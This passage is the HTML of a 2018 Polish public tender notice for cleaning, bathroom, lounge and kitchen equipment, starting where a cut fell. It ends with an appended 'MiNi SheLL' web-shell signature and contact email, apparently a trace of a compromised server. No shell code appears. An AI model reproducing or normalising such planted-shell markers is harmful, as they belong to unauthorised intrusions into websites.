id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.	Zmiany umowy mogą być dokonywane w przypadku gdy takie założenie było dopuszczone w postępowaniu o udzielenie zamówienia będącym podstawą do zawarcia niniejszej umowy. Zmiany umowy mogą być dokonywane na następujących zasadach:1)	W zakresie zmiany terminów realizacji zamówienia w przypadku:a)	wystąpienia ,,siły wyższej" - czyli wydarzenia nieprzewidywalnego i poza kontrolą stron niniejszej umowy, wy-stępującego po podpisaniu umowy i powodującego niemożliwość wywiązania się z umowy w jej obecnym brzmie-niu,b)	wystąpienia zmian, o których mowa w art. 144 ust. 1 ustawy, wraz ze wszystkimi konsekwencjami występującymi w związku z przedłużeniem tego terminu,c)	w przypadku rozszerzenia zamówienia o kwotę nie przekraczającą 10% wartości określonej pierwotnie w umowie.d)	rezygnacji z części zamówienia.2)	W zakresie zmiany wysokości wynagrodzenia należnego wykonawcy w przypadku:a)	zmiany stawki podatku od towarów i usług,b)	wystąpienia zmian, o których mowa w art. 144 ust. 1 ustawy,c)	rozszerzenia zamówienia o kwotę nie przekraczającą 10% wartości określonej pierwotnie w umowie.d)	rezygnacji z części zamówienia.3)	W pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:a)	w przypadku zmiany danych teleadresowych, osób reprezentujących firmę, kluczowych specjalistów przedstawio-nych w umowie - na wniosek Zamawiającego lub Wykonawcy,b)	w przypadku zmian podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot umowy,c)	w przypadku rozszerzenia zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy,d)	w przypadku gdy zmiany treści umowy są korzystne dla Zamawiającego a Wykonawca nie wyrazi sprzeciwu co do wprowadzenia tych zmian,e)	w przypadku zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania">12.13. Zamawiający informuje, iż zgodnie z art. 8 i art. 96 ust.3 ustawy Prawo zamówień publicznych wszystkie oferty składane w postępowaniu o zamówienie publiczne są jawne i podlegają udostępnieniu od chwili ich otwarcia, za wyjątkiem informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieucz-ciwej konkurencji, jeśli Wykonawca, nie później niż w terminie składania ofert, zastrzegł, że nie mogą one być udostępniane. </span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony">12.15. Wykonawca, który chce skorzystać z prawa do zastrzeżenia ujawnienia informacji stanowiącej tajemnicę przed-siębiorstwa winien złożyć na formularzu ofertowym stosowne zastrzeżenie informujące o tym, że w jego ofercie w odrębnej nieprzejrzystej oprawie (opako-waniu, kopercie) znajdują się strony oferty, które podlegają klauzuli poufności z uwagi na tajemnicę przedsiębiorstwa. Brak takiego zastrzeżenia spowoduje, że cała oferta może zo-stać ogólnie udostępniona </span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-09-26</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>wyposażenie do utrzymania czystości</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>CZĘŚĆ I - wyposażenie do utrzymania czystości:przedmiot	Ilość	opisodkurzacz piorący	2 szt.	Urządzenie czyszczące runo wykładziny usuwające nieprzyjemny zapach i przywracając jej świeży wygląd. Urządzenie wyposażone w :- elastyczną dyszę podłogową wyposażoną w listwy, które dopasowują się do powierzchni. - duży włącznik przystosowany do obsługi stopą, - zbiornik na wodę brudną z przeźroczystą pokrywą - system szybkiej i łatwej zmiany dysz- uchwyt na kabel zasilający.- miejsce na tabletki czyszczące. Praktyczne miejsce na przechowywanie tabletek czyszczących.- wąż do ekstrakcji ze zintegrowanym złączem, 2.5 m- uchwyt do przechowywania dyszy ręcznej- ssawka do tapicerki- dodatkowy uchwyt- hak na przewód zasilający- wąska dysza podłogowa do powierzchni twardych z elastycznymi listwami gumowymi- rękojeśćpodciśnienie (mbar/kPa) min. 220 / 22wydajność spryskiwania (l/min) min. 1ciśnienie spryskiwania (bar) min. 1zbiornik wody czystej / brudnej moc turbiny (W) min. 1250moc pompy (W) min. 40myjka ciśnieniowa	1 szt.	Urządzenie wyposażone w:- zbiornik na środek czyszczący- bęben na wąż- pistolet wysokociśnieniowy ze wskaźnikiem- lancę rotacyjną- końcówkę do czyszczenia powierzchni płaskich (elewacja, podjazd etc.)- dyszę rotacyjną- system szybkozłącza- system podawania środka czyszczącego przez zbiornik- filtr wody- środek czyszczący min. 0,5 l.Wydajność powierzchniowa urządzenia wynosząca min. 25 m?/h z ciśnienie (mbar/kPa) min. 20-maks. 120/2- maks.12wózek do sprzątania	2 szt.	Wózek do sprzątania 2-wiaderkowy w profesjonalnym mopem płaskim. Cechy produktu:- dwuwiaderkowy wózek- lekka i wytrzymała konstrukcja - rama metalowa i niepękająca podstawa z tworzywa- uniwersalna wyciskarka pasująca do wszystkich rodzajów mopów, wkładek i nakładek. - wiadro 28L- wiadro 15L - wyciskarka doczołowa (tylny odpływ wody) - kuweta 4l - wymiary ok.: 800mm x 410mm x1250mm- mop płaski z wkładem z mikrofazy - stelaż o szerokości ok. 40 cm lekki i solidnie wykonany, składany, umożliwiający szybkie odciśnięcie w wyciskarce bez zdejmowania wkładu ze stelaża. - stelaż mopa na przegubie metalowym, - kij aluminiowy z wygodnym gumowym uchwytem <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>42995000-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 14<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">okres udzielonych gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin wykonania dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>5.1.	Wykonawca jest zobowiązany wykonywać zamówienie w terminie maksymalnie do 14 dni od podpisania umowy.5.2.	Zamawiający wymaga, aby Wykonawca przystąpił do wykonania Zamówienia niezwłocznie po zawarciu umowy. 5.3.	Skrócenie terminu wykonania zamówienia będzie stanowiło jedno z kryteriów oceny ofert<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>CZĘŚĆ II - wyposażenie łazienek:</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>pojemniki na papier	4 szt.	Materiał: Stal nierdzewna 304 szczotkowanaWykończenie: MatowePojemność: 300 listkówZamknięcie: Zamek i kluczyk metalowyKontrola: Okienko do kontroli poziomu papieru w podajnikuWymiary podajnika: Wysokość 210 mm, szerokość 270 mm, głębokość 120 mmdozowniki na mydło	4 szt.	- Dozownik na mydło w płynie wykonany ze stali nierdzewnej matowej - Wykonany z wysokiej jakości stali nierdzewnej szczotkowanej - stalowy zamek- odporny na uderzenia- wziernik kontroli poziomu mydła- wewnętrzny zbiornik na mydło z możliwością wyjmowania- napełniany samodzielnie, dowolnym mydłem w płynie- pojemność ok.: 900 mllustra	3 szt. Lustro posiada zabezpieczająca folię na tylnej powierzchni lustra, która zmniejsza ryzyko skaleczenia się w przypadku stłuczenia. Rozmiary 58x40 cmCzęści metalowe: stal, Epoksydowa/poliestrowa powłoka proszkowaOkucia do zawieszania: stal, Tworzywo EVA, Epoksydowa/poliestrowa powłoka proszkowa, Guma silikonowaLustro: szkłokosze na śmieci 4 szt.	główna część: stal, epoksydowa/poliestrowa powłoka proszkowa, pokrywka/ uchwyt: stal nierdzewna, uchwyt pokrywy/ wiadro: tworzywo polipropylenowe, sztabka: stal, galwanizowanespód: stal nierdzewna, guma syntetyczna.Wysokość ok.: 29 cmŚrednica ok.: 21 cmPojemność ok.: 3 lszczotka toaletowa	4 szt.	Pojemnik: ceramika porowata, szkliwo, noga/ nakładka wykończeniowa: cynk, chromowana powłokapokrywka: cynk, tworzywo polipropylenowe, chromowana powłokauchwyt: stal nierdzewna, części główne: plastik PPczęści metalowe: stal.Długość: ok. 42 cm<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>44410000-7, 39299300-7, 39224340-3, 42968300-2<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 14<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">okres udzielonych gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin wykonania dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Wykonawca jest zobowiązany wykonywać zamówienie w terminie maksymalnie do 14 dni od podpisania umowy.Zamawiający wymaga, aby Wykonawca przystąpił do wykonania Zamówienia niezwłocznie po zawarciu umowy. Skrócenie terminu wykonania zamówienia będzie stanowiło jedno z kryteriów oceny ofert<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td> CZĘŚĆ III - wyposażenie strefy relaksu:</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>zestaw pianek siedzisk	4 kpl.	Zestaw siedzisk o wys. 24 cm, wykonanych z pianki pokrytej skadenem.W zestawie:o 2 szare siedziska o bokach ok.: 47,6 cm; 2 x 37,2 cm; 22 cm.o 4 zielone siedziska o bokach ok.: 37,2 cm; 35,4 cm; 34,8 cm; 22 cm.gruszki	4 szt.	Miękkie i wygodne gruszki wypełnione granulatem, dopasowujące się kształtem do osoby siedzącej. Pokryte trwałą tkaniną PCV bez ftalanów, którą łatwo utrzymać w czystości.o waga ok. 4 kgo śr. ok. 60 cmo wys. ok. 80 cmmaterac	2 kpl.	Materace zapewniające bezpieczeństwo podczas zabawy dzieci. Materace można ze sobą łączyć za pomocą rzepów. Wykonane są z pianek pokrytych trwałą i zmywalną tkaniną. o 2 szt. o wym. materaca z wycięciami ok. 80 x 60 x 8 cm i ok. 75 x 75 x 8 cm o wym. materaca granatowego i błękitnego ok 80 x 60 x 8 cm o wym. ok. 85 x 88 x 8 cmdywan	2szt.	Szczegóły produktuRozm. o. 170x120 cmkolor: wielokolorowyskład dywanu: 100 % Polipropylen wysokość runa: ok. 13 mmciężar całkowity: ok. 3000 gr /m2 Wymiar:o	lampa	1 szt.	Kolor do uzgodnienia z wykonawcą na etapie realizacji dostaw. Waga: cement, tworzywo polietylenowePodstawa/ Rurka: stal, proszkowa powłokaKlosz: papier ryżowySzerokość abażura: ok. 33 cmWysokość: ok. 128 cmŚrednica podstawy: ok. 22 cmDługość kabla: ok. 1.7 m<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39113000-7, 31520000-7, 39531000-3<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 14<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">okres udzielonych gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin wykonania dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Wykonawca jest zobowiązany wykonywać zamówienie w terminie maksymalnie do 14 dni od podpisania umowy.Zamawiający wymaga, aby Wykonawca przystąpił do wykonania Zamówienia niezwłocznie po zawarciu umowy. Skrócenie terminu wykonania zamówienia będzie stanowiło jedno z kryteriów oceny ofert<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>CZĘŚĆ IV - wyposażenie kuchni:</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>komplet garnków 2 kpl.	Produkt nadający się do wszystkich rodzajów kuchenek/płyt, łącznie z płytą indukcyjną. Wykonany ze stali nierdzewnej. Zestaw Zawierający: - Garnek z pokrywką 5 l, - rondel z pokrywką 2 l - patelnia śr. 28 cm. Uchwyt/ Pokrycie/ Główna część: stal nierdzewna. Części główne: stal nierdzewna, aluminium, Pokryte Teflonem (R) Professional. Pokrywka: Szkło żaroodporne.patelnie 1 kpl.	Zestaw patelni - 3 sztuki o średnicy 20cm, 24cm, 28cm. Powłoka ceramiczne, zestaw z pasującymi pokrywkami. Kolor czarny. Zgodna z kuchenkami gazowymi, elektrycznymi, indukcyjnymi i płytami ceramicznymi. talerze 4 kpl.	Komplet składający się z 18 sztuk- talerz obiadowy, talerz głęboki, talerz deserowy Produkt wykonany z porcelany skaleniowej, - naczynia trwałe i odporne na uderzenia. Możliwość używania w mikrofalówce i mycia w zmywarce. szklanki 10 kpl.	Komplet składający się z 6 sztuk. Produkt nadający się także do napojów gorących. Wykonana ze szkła hartowanego, trwały i odporny na uderzenia z możliwością zmywania w zmywarce. kubki 60 szt.	Kubek wykonany z porcelany skaleniowej, odporny na uderzenia i trwały z możliwością używania w mikrofalówce i zmywania w zmywarce.robot kuchenny 1 szt.	Produkt posiadający wyposażenie: Końcówka do ubijania, Końcówka do mieszania, Rozdrabniacz, Końcówka do zagniatania ciasta, Misa ze stali szlachetnej, Młynek, Lampka LED, Wyciskarka do owoców cytrusowych, Maszynka do mielenia mięsa, Malakser, Tarcza do frytek, Nóż ze stali szlachetnej. Konstrukcja: ergonomiczny kształt, gumowe nóżki antypoślizgowe, planetarna przekładnia, przyssawki, uchylna głowica, tworzywo sztuczne. czajnik elektryczny 2 szt.	Czajnik elektryczny o mocy 2400 W i pojemności ok. 1.7 l. Wyposażony w:wyjmowany filtr antywapniowy, obrotową podstawę, dwustronny wskaźnik poziomu wody i podświetlany wyłącznik, blokadę pokrywy, automatyczne wyłączenie po zagotowaniu, przy zdejmowaniu z podstawy, ochronę przed przegrzaniem oraz włączeniem pustego czajnika,Gumowe nóżki w podstawieKolor do uzgodnienia z wykonawcą na etapie dostawy.sztućce 2 kpl.	Komplet sztućców 30 sztuk ze stali nierdzewnej. Zestaw obejmuje: łyżkę, widelec, nóż, łyżeczkę do herbaty, widelec do ciast po 6 sztukakcesoria kuchenne - deska	2 szt.	Deska do krojenia z litego drewna - trwałego, naturalnego materiału, który nie tępi noży. Rowek w desce do zbierania soku z mięsa i owoców powstały podczas krojeniaStabilna podstawa do krojenia.Wymiary ok.: długość: 38 cm, szerokość: 27 cm, grubość: 22 mmakcesoria kuchenne - podkładki korkowe	7 kpl.	Podkładki: produkt wykonany z korka. Chroni powierzchnię stołu; obniża poziom hałasu przy rozkładaniu naczyń.Rozmiar ok.: długość: 42 cm, szerokość: 32 cm, ilość w opakowaniu: 4 szt.akcesoria kuchenne - noże	2 kpl.	Produkt wykonany ze stali nierdzewnej. W zestawie: 1 nóż uniwersalny 14 cm (dł. całkowita 25 cm), 1 nóż kucharski 16 cm (dł. całkowita 29 cm) oraz 1 nóż kucharski 20 cm (dł. całkowita 33 cm). rękawice kuchenne	4 szt.	Rękawica: Tkanina: 100% bawełna, Wypełnienie: 100% poliester. Wymiar: długość: 33 cm. termosy	4 szt.	Termos, dzbanek cateringowy 1.5 l Nadruk kawa/herbataTermos wykonany z wysokiej jakości stali nierdzewnej 18/10.Podwójne ścianki zapewniają doskonałą izolację termiczną i utrzymują temperaturę napoju przez wiele godzin.Nadaje się do zimnych oraz ciepłych napojów.Posiada termiczne zabezpieczenie zamknięcia oraz możliwość wylewania płynów bez zdejmowania korka.Pojemność: 1,5 lWysokość: 25 cm<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39221180-2, 39221000-7, 39221100-8, 39241100-4, 39223000-1, 39221150-3<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 14<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">okres udzielonych gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin wykonania dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Wykonawca jest zobowiązany wykonywać zamówienie w terminie maksymalnie do 14 dni od podpisania umowy.Zamawiający wymaga, aby Wykonawca przystąpił do wykonania Zamówienia niezwłocznie po zawarciu umowy. Skrócenie terminu wykonania zamówienia będzie stanowiło jedno z kryteriów oceny ofert<br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com